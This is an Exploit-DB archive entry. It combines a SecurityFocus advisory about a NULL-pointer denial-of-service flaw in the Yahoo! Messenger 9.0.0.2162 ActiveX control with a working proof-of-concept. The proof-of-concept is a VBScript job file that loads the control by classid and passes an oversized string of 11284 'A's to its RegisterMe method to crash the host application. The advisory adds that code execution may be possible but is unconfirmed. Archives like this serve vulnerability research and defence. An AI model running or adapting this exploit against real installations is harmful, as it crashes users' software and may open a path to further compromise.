exploit-db-mirror/exploits/windows/dos/33350.xml
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

26 lines
No EOL
820 B
XML

source: https://www.securityfocus.com/bid/37007/info
Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
Yahoo! Messenger 9.0.0.2162 is vulnerable; other versions may also be affected.
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />
<script language='vbscript'>
arg1=String(11284, "A")
target.RegisterMe arg1
</script>
</job>
</package>